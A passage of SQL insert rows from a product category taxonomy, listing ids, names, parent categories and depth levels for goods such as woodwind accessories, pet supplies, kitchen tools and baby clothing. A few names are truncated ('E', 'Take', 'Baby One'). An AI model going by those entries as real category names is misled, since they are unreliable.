(4679,'Baby Bathtubs & Bath Seats',4678,'Baby Bathing',2),
(4682,'Rice',431,'Grains, Rice & Cereal',3),
(4683,'Amaranth',431,'Grains, Rice & Cereal',3),
(4684,'Buckwheat',431,'Grains, Rice & Cereal',3),
(4686,'Millet',431,'Grains, Rice & Cereal',3),
(4687,'Barley',431,'Grains, Rice & Cereal',3),
(4688,'Wheat',431,'Grains, Rice & Cereal',3),
(4689,'Cereal & Granola',431,'Grains, Rice & Cereal',3),
(4690,'Oats, Grits & Hot Cereal',431,'Grains, Rice & Cereal',3),
(4692,'Tahini',427,'Condiments & Sauces',3),
(4696,'Cabinet Hardware',2878,'Hardware Accessories',2),
(4697,'Cabinet Backplates',4696,'Cabinet Hardware',3),
(4698,'Cabinet Catches',4696,'Cabinet Hardware',3),
(4699,'Cabinet Doors',4696,'Cabinet Hardware',3),
(4700,'Cabinet Knobs & Handles',4696,'Cabinet Hardware',3),
(4705,'Rolling Pin Accessories',668,'Kitchen Tools & Utensils',3),
(4706,'Rolling Pin Covers & Sleeves',4705,'Rolling Pin Accessories',4),
(4707,'Rolling Pin Rings',4705,'Rolling Pin Accessories',4),
(4708,'Pastry Cloths',668,'Kitchen Tools & Utensils',3),
(4709,'Generator Accessories',127,'Power & Electrical Supplies',2),
(4714,'Solar Panels',127,'Power & Electrical Supplies',2),
(4715,'Solar Energy Kits',127,'Power & Electrical Supplies',2),
(4716,'Power Tool Combo Sets',4919,'Tool Sets',3),
(4717,'Waste Container Lids',6757,'Waste Containment Accessories',3),
(4718,'Garden Hose Fittings & Valves',3568,'Watering & Irrigation',3),
(4720,'Fondue Pots & Sets',730,'Kitchen Appliances',3),
(4721,'Cookware Sets',654,'Cookware',4),
(4722,'Airpots',2920,'Food & Beverage Carriers',3),
(4726,'Roasting Pan Racks',4502,'Bakeware Accessories',4),
(4728,'Shower Bases',2206,'Shower Parts',4),
(4730,'Birthday Candles',96,'Party Supplies',3),
(4735,'Punch Bowls',4026,'Serveware',4),
(4737,'PDA Accessories',280,'Handheld Device Accessories',4),
(4738,'E',280,'Handheld Device Accessories',4),
(4739,'PDA Cases',4737,'PDA Accessories',5),
(4740,'Potpourri',592,'Home Fragrances',3),
(4741,'Incense Holders',500121,'Home Fragrance Accessories',3),
(4742,'Food Service Carts',135,'Food Service',2),
(4743,'Harmonicas',87,'Woodwinds',4),
(4745,'Tablet Computers',278,'Computers',2),
(4746,'Ice Cube Trays',668,'Kitchen Tools & Utensils',3),
(4748,'Candy & Chocolate',422,'Food Items',2),
(4752,'Pastels',977,'Writing & Drawing Instruments',3),
(4753,'Ice Packs',516,'Hot & Cold Therapies',4),
(4754,'Hygrometers',1305,'Measuring Tools & Sensors',3),
(4755,'Moisture Meters',1305,'Measuring Tools & Sensors',3),
(4756,'Seismometer',1305,'Measuring Tools & Sensors',3),
(4757,'Sound Meters',1305,'Measuring Tools & Sensors',3),
(4758,'UV Light Meters',1305,'Measuring Tools & Sensors',3),
(4759,'Vibration Meters',1305,'Measuring Tools & Sensors',3),
(4760,'3D Glasses',2027,'Video Accessories',3),
(4762,'Spice Grinders',668,'Kitchen Tools & Utensils',3),
(4763,'Food Grinder Accessories',2901,'Kitchen Appliance Accessories',3),
(4764,'Bakeware Sets',640,'Bakeware',4),
(4765,'Kitchen Utensil Sets',668,'Kitchen Tools & Utensils',3),
(4766,'Hair Loss Treatments',486,'Hair Care',3),
(4767,'Prenatal Heart Rate Monitors',494,'Biometric Monitors',3),
(4768,'Baby Care Timers',561,'Nursing & Feeding',2),
(4770,'Flameless Candles',696,'Decor',2),
(4771,'Oven Bags',668,'Kitchen Tools & Utensils',3),
(4775,'Toothbrush Accessories',526,'Oral Care',3),
(4776,'Toothbrush Replacement Heads',4775,'Toothbrush Accessories',4),
(4777,'Condiment Dispensers',668,'Kitchen Tools & Utensils',3),
(4778,'Drawing & Painting Kits',505370,'Art & Craft Kits',4),
(4779,'Costume & Stage Makeup',477,'Makeup',4),
(4785,'Navigational Compasses',1013,'Camping & Hiking',3),
(4786,'Coffee Grinder Accessories',3988,'Coffee Maker & Espresso Machine Accessories',4),
(4788,'Spice Grinder Accessories',668,'Kitchen Tools & Utensils',3),
(4789,'Extension Cords',127,'Power & Electrical Supplies',2),
(4790,'Bassoon Accessories',62,'Woodwind Instrument Accessories',4),
(4791,'Clarinet Accessories',62,'Woodwind Instrument Accessories',4),
(4792,'Flute Accessories',62,'Woodwind Instrument Accessories',4),
(4793,'Oboe & English Horn Accessories',62,'Woodwind Instrument Accessories',4),
(4794,'Saxophone Accessories',62,'Woodwind Instrument Accessories',4),
(4797,'Brass Instrument Care & Cleaning',57,'Brass Instrument Accessories',4),
(4798,'Brass Instrument Replacement Parts',57,'Brass Instrument Accessories',4),
(4806,'String Instrument Care & Cleaning',61,'String Instrument Accessories',4),
(4809,'Bassoon Care & Cleaning',4790,'Bassoon Accessories',5),
(4810,'Bassoon Cases & Gigbags',4790,'Bassoon Accessories',5),
(4811,'Bassoon Parts',4790,'Bassoon Accessories',5),
(4812,'Bassoon Reeds',4790,'Bassoon Accessories',5),
(4813,'Bassoon Stands',4790,'Bassoon Accessories',5),
(4814,'Bassoon Straps & Supports',4790,'Bassoon Accessories',5),
(4818,'Clarinet Care & Cleaning',4791,'Clarinet Accessories',5),
(4819,'Clarinet Cases & Gigbags',4791,'Clarinet Accessories',5),
(4820,'Clarinet Ligatures & Caps',4791,'Clarinet Accessories',5),
(4822,'Clarinet Parts',4791,'Clarinet Accessories',5),
(4823,'Clarinet Pegs & Stands',4791,'Clarinet Accessories',5),
(4824,'Clarinet Reeds',4791,'Clarinet Accessories',5),
(4825,'Clarinet Straps & Supports',4791,'Clarinet Accessories',5),
(4833,'Flute Care & Cleaning',4792,'Flute Accessories',5),
(4834,'Flute Cases & Gigbags',4792,'Flute Accessories',5),
(4836,'Flute Parts',4792,'Flute Accessories',5),
(4837,'Flute Pegs & Stands',4792,'Flute Accessories',5),
(4843,'Oboe Care & Cleaning',4793,'Oboe & English Horn Accessories',5),
(4844,'Oboe Cases & Gigbags',4793,'Oboe & English Horn Accessories',5),
(4845,'Oboe Parts',4793,'Oboe & English Horn Accessories',5),
(4846,'Oboe Pegs & Stands',4793,'Oboe & English Horn Accessories',5),
(4847,'Oboe Reeds',4793,'Oboe & English Horn Accessories',5),
(4848,'Oboe Straps & Supports',4793,'Oboe & English Horn Accessories',5),
(4852,'Saxophone Care & Cleaning',4794,'Saxophone Accessories',5),
(4853,'Saxophone Cases & Gigbags',4794,'Saxophone Accessories',5),
(4854,'Saxophone Ligatures & Caps',4794,'Saxophone Accessories',5),
(4856,'Saxophone Parts',4794,'Saxophone Accessories',5),
(4857,'Saxophone Pegs & Stands',4794,'Saxophone Accessories',5),
(4858,'Saxophone Reeds',4794,'Saxophone Accessories',5),
(4859,'Saxophone Straps & Supports',4794,'Saxophone Accessories',5),
(4866,'Woodwind Cork Grease',62,'Woodwind Instrument Accessories',4),
(4867,'Woodwind Polishing Cloths',62,'Woodwind Instrument Accessories',4),
(4890,'Brass Instrument Cleaning Tools',4797,'Brass Instrument Care & Cleaning',5),
(4891,'Brass Instrument Care Kits',4797,'Brass Instrument Care & Cleaning',5),
(4892,'Brass Instrument Cleaners & Sanitizers',4797,'Brass Instrument Care & Cleaning',5),
(4893,'Brass Instrument Guards',4797,'Brass Instrument Care & Cleaning',5),
(4894,'Brass Instrument Lubricants',4797,'Brass Instrument Care & Cleaning',5),
(4895,'Brass Instrument Polishing Cloths',4797,'Brass Instrument Care & Cleaning',5),
(4911,'String Instrument Cleaning Cloths',4806,'String Instrument Care & Cleaning',5),
(4912,'String Instrument Polish',4806,'String Instrument Care & Cleaning',5),
(4914,'Fireworks & Firecrackers',96,'Party Supplies',3),
(4915,'Sparklers',96,'Party Supplies',3),
(4916,'Baby Carrier Accessories',4386,'Baby Transport Accessories',2),
(4918,'Wood Stove Fans & Blowers',2862,'Fireplace & Wood Stove Accessories',2),
(4919,'Tool Sets',1167,'Tools',2),
(4921,'DJ & Specialty Audio',223,'Audio',2),
(4922,'DJ CD Players',4921,'DJ & Specialty Audio',3),
(4923,'DJ Systems',4921,'DJ & Specialty Audio',3),
(4926,'Fishing Reels',3334,'Fishing',3),
(4927,'Fishing Rods',3334,'Fishing',3),
(4928,'General Purpose Batteries',276,'Batteries',4),
(4929,'Cotton Balls',2915,'Personal Care',2),
(4931,'Laser Levels',1191,'Levels',4),
(4932,'Track Lighting Fixtures',6274,'Track Lighting',3),
(4939,'Woodwind Reed Knives',62,'Woodwind Instrument Accessories',4),
(4941,'Book Lights',6174,'Book Accessories',2),
(4942,'Toothbrush Sanitizers',4775,'Toothbrush Accessories',4),
(4943,'Syrup',427,'Condiments & Sauces',3),
(4947,'Honey',427,'Condiments & Sauces',3),
(4949,'Home Publishing Software',319,'Multimedia & Design Software',3),
(4950,'Animation Editing Software',319,'Multimedia & Design Software',3),
(4951,'Graphic Design & Illustration Software',319,'Multimedia & Design Software',3),
(4952,'Sound Editing Software',319,'Multimedia & Design Software',3),
(4953,'Video Editing Software',319,'Multimedia & Design Software',3),
(4954,'Web Design Software',319,'Multimedia & Design Software',3),
(4955,'Harmonica Accessories',62,'Woodwind Instrument Accessories',4),
(4956,'Harmonica Cases',4955,'Harmonica Accessories',5),
(4957,'Woodwind Reed Cases',62,'Woodwind Instrument Accessories',4),
(4971,'Soap & Lotion Dispensers',574,'Bathroom Accessories',2),
(4972,'Wheelbarrow Parts',505326,'Gardening Tool Accessories',4),
(4973,'Household Cleaning Products',623,'Household Cleaning Supplies',3),
(4974,'Carpet Cleaners',4973,'Household Cleaning Products',4),
(4975,'Dish Detergent & Soap',4973,'Household Cleaning Products',4),
(4976,'Glass & Surface Cleaners',4973,'Household Cleaning Products',4),
(4977,'Floor Cleaners',4973,'Household Cleaning Products',4),
(4978,'Oven & Grill Cleaners',4973,'Household Cleaning Products',4),
(4979,'Pet Odor & Stain Removers',4973,'Household Cleaning Products',4),
(4980,'Toilet Bowl Cleaners',4973,'Household Cleaning Products',4),
(4981,'Tub & Tile Cleaners',4973,'Household Cleaning Products',4),
(4982,'Bleach',627,'Laundry Supplies',3),
(4983,'Accordions & Concertinas',54,'Musical Instruments',3),
(4984,'Bagpipes',54,'Musical Instruments',3),
(4986,'Toy Craft Kits',505370,'Art & Craft Kits',4),
(4988,'Tarps',2878,'Hardware Accessories',2),
(4989,'Bird Cages & Stands',3,'Bird Supplies',3),
(4990,'Bird Food',3,'Bird Supplies',3),
(4991,'Bird Ladders & Perches',3,'Bird Supplies',3),
(4992,'Bird Toys',3,'Bird Supplies',3),
(4993,'Bird Treats',3,'Bird Supplies',3),
(4997,'Cat Furniture',4,'Cat Supplies',3),
(4999,'Cat Litter',4,'Cat Supplies',3),
(5000,'Cat Litter Boxes',4,'Cat Supplies',3),
(5001,'Cat Toys',4,'Cat Supplies',3),
(5002,'Cat Treats',4,'Cat Supplies',3),
(5004,'Dog Apparel',5,'Dog Supplies',3),
(5010,'Dog Toys',5,'Dog Supplies',3),
(5011,'Dog Treats',5,'Dog Supplies',3),
(5013,'Small Animal Supplies',2,'Pet Supplies',2),
(5014,'Small Animal Bedding',5013,'Small Animal Supplies',3),
(5015,'Small Animal Food',5013,'Small Animal Supplies',3),
(5016,'Small Animal Habitat Accessories',5013,'Small Animal Supplies',3),
(5017,'Small Animal Habitats & Cages',5013,'Small Animal Supplies',3),
(5019,'Aquarium Decor',6,'Fish Supplies',3),
(5020,'Aquarium Filters',6,'Fish Supplies',3),
(5021,'Aquarium Gravel & Substrates',6,'Fish Supplies',3),
(5023,'Aquarium Stands',6,'Fish Supplies',3),
(5024,'Fish Food',6,'Fish Supplies',3),
(5025,'Horse Grooming',3257,'Horse Care',4),
(5026,'Reptile & Amphibian Food',7,'Reptile & Amphibian Supplies',3),
(5027,'Reptile & Amphibian Habitat Accessories',7,'Reptile & Amphibian Supplies',3),
(5028,'Reptile & Amphibian Habitat Heating & Lighting',7,'Reptile & Amphibian Supplies',3),
(5029,'Reptile & Amphibian Habitats',7,'Reptile & Amphibian Supplies',3),
(5030,'Reptile & Amphibian Substrates',7,'Reptile & Amphibian Supplies',3),
(5032,'Digital Goods & Currency',2092,'Software',1),
(5034,'Computer Icons',5032,'Digital Goods & Currency',2),
(5035,'Desktop Wallpaper',5032,'Digital Goods & Currency',2),
(5036,'Fonts',5032,'Digital Goods & Currency',2),
(5037,'Product Manuals',783,'Media',1),
(5038,'Electronics Manuals',5037,'Product Manuals',2),
(5039,'Household Appliance Manuals',5037,'Product Manuals',2),
(5040,'Kitchen Appliance Manuals',5037,'Product Manuals',2),
(5041,'Vehicle Service Manuals',5037,'Product Manuals',2),
(5042,'Ice Crusher & Shaver Accessories',2901,'Kitchen Appliance Accessories',3),
(5043,'Drinking Straws & Stirrers',96,'Party Supplies',3),
(5044,'Outdoor Benches',6368,'Outdoor Seating',3),
(5046,'Harmonica Holders',4955,'Harmonica Accessories',5),
(5048,'Shower Water Filters',2206,'Shower Parts',4),
(5049,'Baby Safety Harnesses & Leashes',540,'Baby Safety',2),
(5050,'Ski & Snowboard Goggle Lenses',8203,'Ski & Snowboard Goggle Accessories',5),
(5054,'Fudge',1876,'Bakery',3),
(5055,'Erotic Food & Edibles',773,'Erotic',2),
(5056,'Trash Compactor Accessories',630,'Household Supplies',2),
(5057,'Soy Milk Makers',730,'Kitchen Appliances',3),
(5059,'Straw Holders & Dispensers',2948,'Kitchen Organizers',4),
(5060,'Replacement Drink Lids',2920,'Food & Beverage Carriers',3),
(5062,'Craft Pipe Cleaners',505377,'Crafting Wire',5),
(5065,'Coffee Maker Water Filters',3988,'Coffee Maker & Espresso Machine Accessories',4),
(5066,'Frothing Pitchers',3988,'Coffee Maker & Espresso Machine Accessories',4),
(5067,'Gun Lights',2214,'Gun Care & Accessories',3),
(5068,'Vehicle Jump Starters',8236,'Vehicle Repair & Specialty Tools',4),
(5070,'Greeting Card Organizers',923,'Filing & Organization',2),
(5071,'Biometric Monitor Accessories',491,'Health Care',2),
(5072,'Body Weight Scale Accessories',5071,'Biometric Monitor Accessories',3),
(5075,'Popcorn Maker Accessories',2901,'Kitchen Appliance Accessories',3),
(5076,'Cotton Candy Machine Accessories',2901,'Kitchen Appliance Accessories',3),
(5077,'Milling Machines',1167,'Tools',2),
(5078,'Carving Forks',668,'Kitchen Tools & Utensils',3),
(5079,'Aquarium Lighting',6,'Fish Supplies',3),
(5080,'Sink Mats & Grids',668,'Kitchen Tools & Utensils',3),
(5081,'Pet Vitamins & Supplements',2,'Pet Supplies',2),
(5082,'Cat Apparel',4,'Cat Supplies',3),
(5084,'Laundry Balls',627,'Laundry Supplies',3),
(5085,'Laundry Wash Bags & Frames',627,'Laundry Supplies',3),
(5086,'Pet Medicine',2,'Pet Supplies',2),
(5087,'Pet Playpens',2,'Pet Supplies',2),
(5088,'Snowboard Binding Parts',499845,'Skiing & Snowboarding',4),
(5089,'Fan Accessories',3348,'Household Appliance Accessories',2),
(5090,'Chocolate Tempering Machines',730,'Kitchen Appliances',3),
(5091,'Gift Boxes & Tins',94,'Gift Wrapping',4),
(5092,'Pet Bells & Charms',2,'Pet Supplies',2),
(5093,'Pet ID Tags',2,'Pet Supplies',2),
(5094,'Dog Houses',5,'Dog Supplies',3),
(5096,'Music Composition Software',319,'Multimedia & Design Software',3),
(5097,'Take',135,'Food Service',2),
(5098,'Disposable Bowls',4632,'Disposable Tableware',3),
(5099,'Disposable Cups',4632,'Disposable Tableware',3),
(5100,'Disposable Cutlery',4632,'Disposable Tableware',3),
(5101,'Disposable Plates',4632,'Disposable Tableware',3),
(5102,'Concession Food Containers',135,'Food Service',2),
(5103,'Food Warmers',730,'Kitchen Appliances',3),
(5104,'Plate & Dish Warmers',135,'Food Service',2),
(5105,'Floss Sugar',2660,'Cooking & Baking Ingredients',3),
(5106,'Motorcycle Goggles',5547,'Motorcycle Protective Gear',4),
(5107,'Yoga Mat Bags & Straps',999,'Yoga & Pilates',3),
(5109,'Ricers',668,'Kitchen Tools & Utensils',3),
(5110,'Grill Presses',654,'Cookware',4),
(5111,'Shaving Kits',528,'Shaving & Grooming',3),
(5112,'USB Drive Duplicators',5268,'Disk Duplicators',5),
(5113,'Cleaning Gloves',623,'Household Cleaning Supplies',3),
(5114,'Decorative Fans',167,'Clothing Accessories',2),
(5119,'Twine',502977,'Chain, Wire & Rope',3),
(5120,'Sewing Machine Feet',504643,'Art & Crafting Tool Accessories',4),
(5121,'Sewing Machine Tables',6392,'Tables',2),
(5122,'Watch Accessories',188,'Jewelry',2),
(5123,'Watch Bands',5122,'Watch Accessories',3),
(5124,'Watch Repair Kits',5573,'Jewelry Cleaning & Care',2),
(5127,'Dictionary & Translation Software',313,'Computer Software',2),
(5128,'Flatware Chests',636,'Storage & Organization',3),
(5129,'Audio Transmitters',2165,'Audio Components',3),
(5130,'Bluetooth Transmitters',5129,'Audio Transmitters',4),
(5133,'PDA Batteries',276,'Batteries',4),
(5134,'Honey Jars',2626,'Food Storage',3),
(5135,'Cake Boards',4026,'Serveware',4),
(5136,'Craft Knives',504640,'Craft Cutting & Embossing Tools',5),
(5137,'Cutting Mats',504639,'Art & Crafting Tools',4),
(5138,'Garment Steamers',2706,'Laundry Appliances',3),
(5139,'Irons & Ironing Systems',2706,'Laundry Appliances',3),
(5140,'Steam Presses',2706,'Laundry Appliances',3),
(5141,'Hand Dryers',574,'Bathroom Accessories',2),
(5142,'Power Inverters',127,'Power & Electrical Supplies',2),
(5143,'Hazardous Waste Containers',4516,'Waste Containment',3),
(5144,'Pet Muzzles',2,'Pet Supplies',2),
(5145,'Pet Medical Collars',2,'Pet Supplies',2),
(5150,'Model Trains & Train Sets',5999,'Model Making',3),
(5151,'Model Train Accessories',5999,'Model Making',3),
(5152,'Toy Trains & Train Sets',2505,'Play Vehicles',3),
(5153,'Toy Train Accessories',5970,'Play Vehicle Accessories',3),
(5154,'Toothpaste Squeezers & Dispensers',526,'Oral Care',3),
(5155,'Denture Adhesives',526,'Oral Care',3),
(5156,'Frozen Drink Makers',730,'Kitchen Appliances',3),
(5157,'Knife Blocks & Holders',2948,'Kitchen Organizers',4),
(5158,'Garment Steamer Accessories',3456,'Laundry Appliance Accessories',3),
(5159,'Iron Accessories',3456,'Laundry Appliance Accessories',3),
(5160,'Steam Press Accessories',3456,'Laundry Appliance Accessories',3),
(5161,'Aquarium Water Treatments',6,'Fish Supplies',3),
(5162,'Pet Food Containers',2,'Pet Supplies',2),
(5163,'Pet Food Scoops',2,'Pet Supplies',2),
(5164,'Walking Aids',519,'Mobility & Accessibility',3),
(5165,'Canes & Walking Sticks',5164,'Walking Aids',4),
(5166,'Walkers',5164,'Walking Aids',4),
(5167,'Medical Furniture',2496,'Medical',2),
(5168,'Chiropractic Tables',5167,'Medical Furniture',3),
(5169,'Examination Chairs & Tables',5167,'Medical Furniture',3),
(5170,'Medical Cabinets',5167,'Medical Furniture',3),
(5171,'Medical Carts',5167,'Medical Furniture',3),
(5172,'Surgical Tables',5167,'Medical Furniture',3),
(5173,'Crash Carts',5171,'Medical Carts',4),
(5174,'IV Poles & Carts',5171,'Medical Carts',4),
(5181,'Luggage & Bags',0,'',0),
(5183,'Pant Suits',1594,'Suits',3),
(5192,'Costume Accessories',184,'Costumes & Accessories',2),
(5193,'Costumes',184,'Costumes & Accessories',2),
(5194,'Masks',184,'Costumes & Accessories',2),
(5207,'Handkerchiefs',167,'Clothing Accessories',2),
(5251,'Kitchen Shears',668,'Kitchen Tools & Utensils',3),
(5252,'Baby Health',537,'Baby & Toddler',1),
(5253,'Nasal Aspirators',5252,'Baby Health',2),
(5254,'Barebone Computers',278,'Computers',2),
(5255,'Interactive Kiosks',278,'Computers',2),
(5256,'Data Collectors',298,'Handheld Devices',3),
(5257,'Projector Mounts',393,'Projector Accessories',4),
(5258,'Printer Consumables',502990,'Printer, Copier & Fax Machine Accessories',3),
(5259,'Printer Drums & Drum Kits',5258,'Printer Consumables',4),
(5260,'Printer Ribbons',5258,'Printer Consumables',4),
(5261,'Printheads',5258,'Printer Consumables',4),
(5262,'Printer Maintenance Kits',5258,'Printer Consumables',4),
(5264,'Blank ID Cards',956,'Paper Products',3),
(5265,'Printer Duplexers',502990,'Printer, Copier & Fax Machine Accessories',3),
(5266,'Printer Filters',5258,'Printer Consumables',4),
(5268,'Disk Duplicators',2414,'Storage Devices',4),
(5269,'Network Storage Systems',2414,'Storage Devices',4),
(5271,'Hard Drive Duplicators',5268,'Disk Duplicators',5),
(5272,'Hard Drive Arrays',2414,'Storage Devices',4),
(5273,'Patch Panels',3328,'Cable Management',3),
(5274,'Power Supply Enclosures',275,'Power',3),
(5275,'Caller IDs',262,'Communications',2),
(5276,'Streaming & Home Media Players',387,'Video Players & Recorders',3),
(5278,'Video Servers',386,'Video',2),
(5280,'Video Camera Lenses',149,'Camera & Video Camera Lenses',3),
(5282,'Binocular & Monocular Accessories',160,'Optic Accessories',3),
(5283,'Rangefinder Accessories',160,'Optic Accessories',3),
(5284,'Telescope Accessories',160,'Optic Accessories',3),
(5286,'Vacuum Coffee Makers',736,'Coffee Makers & Espresso Machines',4),
(5287,'Beverage Warmers',730,'Kitchen Appliances',3),
(5289,'Toasters & Grills',730,'Kitchen Appliances',3),
(5291,'Pizzelle Makers',5289,'Toasters & Grills',4),
(5292,'Tortilla & Flatbread Makers',5289,'Toasters & Grills',4),
(5294,'Floor Polishers & Buffers',604,'Household Appliances',2),
(5295,'Dental Water Jets',526,'Oral Care',3),
(5296,'Bottle Warmers & Sterilizers',561,'Nursing & Feeding',2),
(5298,'Nursing Pillows',561,'Nursing & Feeding',2),
(5299,'Antivirus & Security Software',313,'Computer Software',2),
(5300,'Business & Productivity Software',313,'Computer Software',2),
(5301,'Computer Utilities & Maintenance Software',313,'Computer Software',2),
(5302,'Network Software',313,'Computer Software',2),
(5303,'Office Application Software',313,'Computer Software',2),
(5304,'Financial, Tax & Accounting Software',313,'Computer Software',2),
(5308,'Stylus Pens',279,'Computer Accessories',3),
(5309,'Digital Note Taking Pens',1928,'Input Devices',4),
(5310,'Signature Capture Pads',505825,'Cash Register & POS Terminal Accessories',4),
(5311,'Collectible Knives',220,'Collectible Weapons',4),
(5312,'Diving Knives & Shears',1135,'Diving & Snorkeling',4),
(5317,'Hair Curler Clips & Pins',6018,'Hair Styling Tool Accessories',4),
(5318,'Muffin & Cupcake Makers',5289,'Toasters & Grills',4),
(5319,'Foam Rollers',990,'Exercise & Fitness',2),
(5322,'Activewear',1604,'Clothing',2),
(5327,'Jock Straps',213,'Underwear & Socks',3),
(5329,'Wedding Dresses',5441,'Wedding & Bridal Party Dresses',3),
(5330,'Bridal Party Dresses',5441,'Wedding & Bridal Party Dresses',3),
(5338,'Self Tanner',2740,'Tanning Products',5),
(5339,'Tanning Oil & Lotion',2740,'Tanning Products',5),
(5340,'Tagines & Clay Cooking Pots',654,'Cookware',4),
(5343,'Kimonos',5388,'Traditional & Ceremonial Clothing',3),
(5344,'Skorts',1604,'Clothing',2),
(5346,'Surveillance Camera Lenses',149,'Camera & Video Camera Lenses',3),
(5349,'Food Heat Lamps',5103,'Food Warmers',4),
(5359,'Advent Calendars',596,'Seasonal & Holiday Decorations',3),
(5362,'Snow Removal',689,'Lawn & Garden',2),
(5363,'Snow Shovels',5362,'Snow Removal',3),
(5364,'Ice Scrapers & Snow Brushes',5362,'Snow Removal',3),
(5366,'Fingerprint Readers',1928,'Input Devices',4),
(5367,'Capos',3502,'Guitar Accessories',5),
(5368,'Guitar Slides',3502,'Guitar Accessories',5),
(5369,'Phono Preamps',246,'Signal Processors',4),
(5370,'Flour Sifters',668,'Kitchen Tools & Utensils',3),
(5371,'Geiger Counters',1305,'Measuring Tools & Sensors',3),
(5378,'Boxing Shorts',5322,'Activewear',3),
(5379,'Martial Arts Shorts',5322,'Activewear',3),
(5380,'Surge Protection Devices',275,'Power',3),
(5381,'Power Amplifiers',224,'Audio Amplifiers',4),
(5385,'Shoe Covers',1933,'Shoe Accessories',2),
(5387,'Costume Shoes',184,'Costumes & Accessories',2),
(5388,'Traditional & Ceremonial Clothing',1604,'Clothing',2),
(5390,'Traditional Clothing Accessories',167,'Clothing Accessories',2),
(5394,'Crampons',499815,'Climbing Apparel & Accessories',4),
(5395,'Karaoke System Accessories',1420,'Audio Accessories',3),
(5396,'Karaoke Chips',5395,'Karaoke System Accessories',4),
(5399,'Wetsuit Hoods, Gloves & Boots',499814,'Wetsuit Pieces',5),
(5400,'Wetsuit Bottoms',499814,'Wetsuit Pieces',5),
(5401,'Wetsuit Tops',499814,'Wetsuit Pieces',5),
(5402,'Trail Cameras',142,'Cameras',2),
(5403,'Poker Chips & Sets',3793,'Games',2),
(5404,'Intercom Accessories',262,'Communications',2),
(5406,'Fishing & Hunting Waders',3334,'Fishing',3),
(5408,'Baby & Toddler Bottoms',182,'Baby & Toddler Clothing',3),
(5409,'Baby & Toddler Swimwear',182,'Baby & Toddler Clothing',3),
(5410,'Baby & Toddler Tops',182,'Baby & Toddler Clothing',3),
(5411,'Baby One',182,'Baby & Toddler Clothing',3),
(5412,'Baby & Toddler Sleepwear',182,'Baby & Toddler Clothing',3),
(5422,'Baby & Toddler Clothing Accessories',167,'Clothing Accessories',2),
(5423,'Baby & Toddler Socks & Tights',182,'Baby & Toddler Clothing',3),
(5424,'Baby & Toddler Dresses',182,'Baby & Toddler Clothing',3),
(5425,'Baby & Toddler Outerwear',182,'Baby & Toddler Clothing',3),
(5426,'Costume Hats',5192,'Costume Accessories',3),
(5429,'Camera Straps',143,'Camera Parts & Accessories',3),
(5431,'Flash Reflectors',2475,'Studio Lighting Controls',4),
(5432,'Softboxes',2475,'Studio Lighting Controls',4),
(5434,'Multitrack Recorders',242,'Audio Players & Recorders',3),
(5435,'Crossovers',246,'Signal Processors',4),
(5438,'Motor Vehicle Cassette Players',8526,'Motor Vehicle Electronics',3),
(5441,'Wedding & Bridal Party Dresses',1604,'Clothing',2),
(5443,'Bridal Accessories',167,'Clothing Accessories',2),
(5446,'Bridal Veils',5443,'Bridal Accessories',3),
(5450,'Video Transmitters',386,'Video',2),
(5452,'Party Favors',96,'Party Supplies',3),
(5453,'Wedding Favors',5452,'Party Favors',4),
(5455,'Wedding Ceremony Supplies',5605,'Religious & Ceremonial',1),
(5456,'Flower Girl Baskets',5455,'Wedding Ceremony Supplies',2),
(5457,'Ring Pillows & Holders',5455,'Wedding Ceremony Supplies',2),
(5459,'Printer Stands',502990,'Printer, Copier & Fax Machine Accessories',3),
(5460,'Hunting Clothing',5322,'Activewear',3),
(5461,'Hunting & Fishing Vests',5460,'Hunting Clothing',4),
(5462,'Ghillie Suits',5460,'Hunting Clothing',4),
(5463,'Motorcycle Suits',5517,'Motorcycle Protective Clothing',4),
(5466,'Electronics Films & Shields',2082,'Electronics Accessories',2),
(5467,'Privacy Filters',5466,'Electronics Films & Shields',3),
(5468,'Screen Protectors',5466,'Electronics Films & Shields',3),
(5469,'Keyboard Protectors',5466,'Electronics Films & Shields',3),
(5471,'TV Replacement Lamps',403,'Television Parts & Accessories',4),
(5472,'Place Card Holders',96,'Party Supplies',3),
(5473,'Signal Boosters',2082,'Electronics Accessories',2),
(5476,'Antenna Accessories',2082,'Electronics Accessories',2),
(5477,'Antenna Mounts & Brackets',5476,'Antenna Accessories',3),
(5478,'Antenna Rotators',5476,'Antenna Accessories',3),
(5479,'Camera Flash Accessories',143,'Camera Parts & Accessories',3),
(5481,'Melodicas',87,'Woodwinds',4),
(5483,'Religious Ceremonial Clothing',5388,'Traditional & Ceremonial Clothing',3),
(5484,'Contractor Pants & Coveralls',2306,'Uniforms',3),
(5487,'Distance Meters',1305,'Measuring Tools & Sensors',3),
(5488,'Accessibility Furniture & Fixtures',519,'Mobility & Accessibility',3),
(5489,'Computer Risers & Stands',279,'Computer Accessories',3),
(5491,'Dummy Surveillance Cameras',359,'Business & Home Security',2),
(5493,'Outdoor Umbrella Bases',6751,'Outdoor Umbrella & Sunshade Accessories',4),
(5494,'Umbrella Stands & Racks',2446,'Storage Hooks & Racks',4),
(5496,'Wireless Access Points',1350,'Bridges & Routers',3),
(5497,'Wireless Routers',1350,'Bridges & Routers',3),
(5499,'Light Meter Accessories',42,'Lighting & Studio',3),
(5502,'Label Tapes & Refill Rolls',960,'Labels & Tags',3),
(5503,'TV Converter Boxes',403,'Television Parts & Accessories',4),
(5504,'Christmas Tree Skirts',596,'Seasonal & Holiday Decorations',3),
(5506,'Chaps',203,'Outerwear',3),
(5507,'Eyewear Cases & Holders',2521,'Eyewear Accessories',4),
(5508,'Bathtub Skirts',2996,'Bathtub Accessories',4),
(5512,'Motorcycle Bags & Panniers',8237,'Vehicle Storage & Cargo',3),
(5513,'Nightgowns',208,'Sleepwear & Loungewear',3),
(5514,'Rain Pants',203,'Outerwear',3),
(5515,'Air Quality Meters',1305,'Measuring Tools & Sensors',3),
(5516,'Color Calibrators',283,'Computer Monitor Accessories',4),
(5517,'Motorcycle Protective Clothing',5322,'Activewear',3),
(5521,'Bird & Wildlife Feeder Accessories',696,'Decor',2),
(5523,'Electronics Stickers & Decals',5466,'Electronics Films & Shields',3),
(5524,'Trampoline Accessories',1249,'Outdoor Play Equipment',2),
(5525,'Motor Vehicle Cassette Adapters',8526,'Motor Vehicle Electronics',3),
(5526,'Measuring Tool & Sensor Accessories',3650,'Tool Accessories',2),
(5529,'Reading Toys',1262,'Educational Toys',3),
(5531,'Card Files',923,'Filing & Organization',2),
(5532,'Camera Remote Controls',143,'Camera Parts & Accessories',3),
(5533,'Power Converters',127,'Power & Electrical Supplies',2),
(5537,'Dinnerware Sets',673,'Dinnerware',4),
(5540,'Bicycle Computer Accessories',3214,'Bicycle Accessories',4),
